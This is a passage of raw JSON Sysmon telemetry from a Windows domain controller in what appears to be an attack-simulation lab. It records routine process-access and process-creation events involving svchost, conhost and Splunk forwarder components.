C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2076-5F25-0000-0010512D0600}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2076-5F25-0000-0010512D0600}","TargetProcessId":"3264","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nProcessGuid: {41C8662E-2077-5F25-0000-0010542F0600}\r\nProcessId: 3296\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","ProcessGuid":"{41C8662E-2077-5F25-0000-0010542F0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 